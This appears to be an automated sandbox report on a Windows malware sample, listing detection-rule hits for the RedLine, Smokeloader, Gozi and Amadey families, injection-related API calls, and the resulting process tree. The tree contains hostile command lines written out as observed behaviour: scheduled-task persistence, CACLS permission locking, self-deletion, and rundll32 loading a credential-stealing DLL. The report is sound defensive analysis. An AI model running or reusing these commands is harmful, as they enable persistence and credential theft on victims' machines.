Source: 0000000B.00000002.393611577.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000018.00000002.797855651.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.778202209.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.787937568.0000000000A41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000026.00000000.469133580.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000020.00000002.806650961.0000000000951000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.393447143.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001A.00000002.593292685.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED	Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey
Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED	Matched rule: INDICATOR_TOOL_PWS_Amady author = ditekSHen, description = Detects password stealer DLL. Dropped by Amadey

Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: String function: 00418C10 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: String function: 00416F20 appears 130 times

Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_00401386 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_0040145D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_00401469 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_0040148C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,

Source: EB2B.exe.1.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: B4A7.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: q4Z52wRd28.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\cttgcew

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@67/24@47/20

Source: C:\Users\user\AppData\Local\Temp\A852.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: q4Z52wRd28.exe

Virustotal: Detection: 31%

Source: C:\Users\user\Desktop\q4Z52wRd28.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\q4Z52wRd28.exe C:\Users\user\Desktop\q4Z52wRd28.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\cttgcew C:\Users\user\AppData\Roaming\cttgcew
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A852.exe C:\Users\user\AppData\Local\Temp\A852.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B4A7.exe C:\Users\user\AppData\Local\Temp\B4A7.exe
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CF35.exe C:\Users\user\AppData\Local\Temp\CF35.exe
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y\|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E35A.exe C:\Users\user\AppData\Local\Temp\E35A.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Process created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F771.exe C:\Users\user\AppData\Local\Temp\F771.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Process created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\EB2B.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A852.exe C:\Users\user\AppData\Local\Temp\A852.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B4A7.exe C:\Users\user\AppData\Local\Temp\B4A7.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CF35.exe C:\Users\user\AppData\Local\Temp\CF35.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E35A.exe C:\Users\user\AppData\Local\Temp\E35A.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F771.exe C:\Users\user\AppData\Local\Temp\F771.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Process created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y\|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\CF35.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Process created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Process created: C:\Users\user\AppData\Local\Temp\EB2B.exe C:\Users\user\AppData\Local\Temp\EB2B.exe
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\EB2B.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Source: C:\Users\user\AppData\Local\Temp\F771.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\A852.tmp

Jump to behavior

Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: EB2B.exe, 00000024.00000003.489269330.00000000273D4000.00000004.00000800.00020000.00000000.sdmp, 07477506288530029273670714.36.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: EB2B.exe, 00000024.00000002.568686695.0000000027195000.00000004.00000800.00020000.00000000.sdmp, EB2B.exe, 00000024.00000002.595728962.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Users\user\AppData\Local\Temp\F771.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_00404350 ShellExecuteA,CreateToolhelp32Snapshot,

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main

